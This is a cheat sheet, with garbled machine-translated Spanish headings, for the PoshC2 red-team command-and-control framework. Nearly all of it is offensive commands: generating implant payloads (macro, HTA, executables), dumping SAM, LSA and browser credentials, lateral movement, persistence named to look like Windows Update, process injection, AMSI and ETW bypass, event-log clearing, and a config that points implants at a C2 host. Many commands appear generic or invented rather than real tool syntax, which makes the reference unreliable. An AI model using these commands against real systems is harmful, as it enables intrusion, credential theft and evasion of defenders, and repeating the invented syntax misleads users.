Hoja de Cheat Marco PoshC2
"Clase de la hoja" idbutton id="poshc2-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="poshc2-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
PoshC2 es un marco C2 proxy-aware desarrollado por Nettitude para actividades de equipo rojo y post-explotación. Cuenta con capacidades de explotación PowerShell, herramientas de movimiento lateral y soporte proxy integral para operar en entornos de red restringidos.
NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación
Instalación Ubuntu/Debian
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential
# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2
# Install PoshC2
sudo ./Install.sh
# Alternative pip installation
pip3 install poshc2
Docker Instalación
# Pull PoshC2 Docker image
docker pull nettitude/poshc2
# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2
# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
Instalación manual
# Install Python dependencies
pip3 install -r requirements.txt
# Install additional tools
sudo apt install mingw-w64 mono-mcs
# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
Uso básico
Inicio PoshC2 Server
# Start PoshC2 server
poshc2 --start
# Start with custom configuration
poshc2 --start --config /path/to/config.yml
# Start with specific project
poshc2 --start --project MyProject
Creación de un nuevo proyecto
# Create new project
poshc2 --new-project ProjectName
# List projects
poshc2 --list-projects
# Switch project
poshc2 --project ProjectName
Referencia del Comando
Gestión de servidores
| Command | Description |
|---|---|
help |
Display help menu |
show-urls |
Show payload URLs |
list-implants |
List active implants |
implant-handler |
Enter implant handler |
quit |
Exit PoshC2 |
Mandos de manipulador de implante
| Command | Description |
|---|---|
help |
Show implant commands |
back |
Return to main menu |
list-implants |
List all implants |
use <implant-id> |
Select implant |
kill <implant-id> |
Kill implant |
remove-implant <implant-id> |
Remove implant from database |
Interacción de implantes
| Command | Description |
|---|---|
help |
Show available commands |
shell <command> |
Execute shell command |
upload-file <local> <remote> |
Upload file |
download-file <remote> |
Download file |
screenshot |
Take screenshot |
get-system |
Attempt privilege escalation |
Generación de carga útil
PowerShell Payloads
# Generate PowerShell payload
poshc2 --gen-payload powershell
# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded
# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080
Carga de pago ejecutable
# Generate Windows executable
poshc2 --gen-payload exe
# Generate DLL payload
poshc2 --gen-payload dll
# Generate service executable
poshc2 --gen-payload service-exe
Cargos Web
# Generate HTA payload
poshc2 --gen-payload hta
# Generate macro payload
poshc2 --gen-payload macro
# Generate JavaScript payload
poshc2 --gen-payload js
Linux Payloads
# Generate Linux Python payload
poshc2 --gen-payload py
# Generate Linux shell payload
poshc2 --gen-payload sh
# Generate Linux ELF payload
poshc2 --gen-payload elf
Configuración Proxy
HTTP Proxy Support
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080
# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080
# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080
Configuración de Cadena Proxy
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080
# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
Proxy Testing
# Test proxy connectivity
test-proxy http://proxy.company.com:8080
# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
Comandos de Despliegue
Información del sistema
# Get system information
get-computerinfo
# Get current user
whoami
# Get domain information
get-domain
# Get local users
get-localuser
# Get local groups
get-localgroup
Cosecha temporal
# Dump SAM database
hashdump
# Dump LSA secrets
lsa-secrets
# Dump cached credentials
cachedump
# Extract browser passwords
get-browserdata
# Dump WiFi passwords
get-wifipasswords
Active Directory Enumeration
# Get domain controllers
get-domaincontroller
# Get domain users
get-domainuser
# Get domain groups
get-domaingroup
# Get domain computers
get-domaincomputer
# Get domain admins
get-domainadmin
Movimiento Lateral
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"
# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"
# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"
# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
Persistencia
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"
# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"
# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"
Características avanzadas
Módulos PowerShell
# Load PowerShell module
loadmodule /path/to/module.ps1
# Import PowerView
loadmodule PowerView
# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz
# Import PowerUp
loadmodule PowerUp
. NET Assembly Execution
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments
# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments
# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
Inyección del proceso
# Inject into process
inject-shellcode -processid 1234 -shellcode <base64>
# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe
# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
Operaciones de red
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389
# Network discovery
invoke-networkscan -subnet 192.168.1.0/24
# SMB enumeration
invoke-smbenum -target 192.168.1.10
# Share enumeration
invoke-shareenum -target 192.168.1.10
Técnicas de evacuación
AMSI Bypass
# AMSI bypass
amsi-bypass
# Custom AMSI bypass
amsi-bypass -method custom
# Reflection-based bypass
amsi-bypass -method reflection
ETW Bypass
# ETW bypass
etw-bypass
# Disable ETW logging
disable-etw
# Patch ETW functions
patch-etw
PowerShell Logging Bypass
# Disable PowerShell logging
disable-pslogging
# Bypass script block logging
bypass-scriptblocklogging
# Disable module logging
disable-modulelogging
Obfuscation
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"
# String obfuscation
obfuscate-string "sensitive string"
# Variable obfuscation
obfuscate-variables
Pivoting and Tunneling
SOCKS Proxy
# Start SOCKS proxy
start-socksproxy -port 1080
# Stop SOCKS proxy
stop-socksproxy
# List proxy connections
list-socksproxy
Port Forwarding
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80
# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22
# Stop port forward
stop-portforward -id 1
Beacon Chaining
# Create beacon chain
new-beacon -parent <parent-id> -child <child-id>
# List beacon chains
list-beacons
# Remove beacon chain
remove-beacon -id <beacon-id>
Seguridad operacional
Seguridad de la comunicación
# Use HTTPS communications
set-comms https
# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"
# Domain fronting
set-domainfront cdn.example.com
Seguridad de carga
# Encrypt payloads
encrypt-payload -key "encryption-key"
# Sign payloads
sign-payload -cert /path/to/cert.pfx
# Obfuscate payloads
obfuscate-payload -method xor
Anti-Forenseics
# Clear event logs
clear-eventlogs
# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"
# Secure delete
sdelete -file /path/to/file
# Clear tracks
clear-tracks
Solución de problemas
Cuestiones de conexión
# Check implant connectivity
test-connectivity
# Verify proxy settings
show-proxy
# Test DNS resolution
test-dns google.com
# Check firewall rules
get-firewallrules
Cuestiones de carga
# Regenerate payloads
regenerate-payloads
# Test payload execution
test-payload /path/to/payload.exe
# Check AV detection
test-av /path/to/payload.exe
Cuestiones de ejecución
# Adjust beacon interval
set-beacon-time 30
# Optimize jitter
set-jitter 0.2
# Reduce payload size
compress-payload
Cuestiones de base de datos
# Repair database
repair-database
# Backup database
backup-database /path/to/backup
# Restore database
restore-database /path/to/backup
Configuración
Configuración del servidor
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
Configuración Proxy
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http" # http, socks4, socks5
Recursos
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de PoshC2 Framework. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *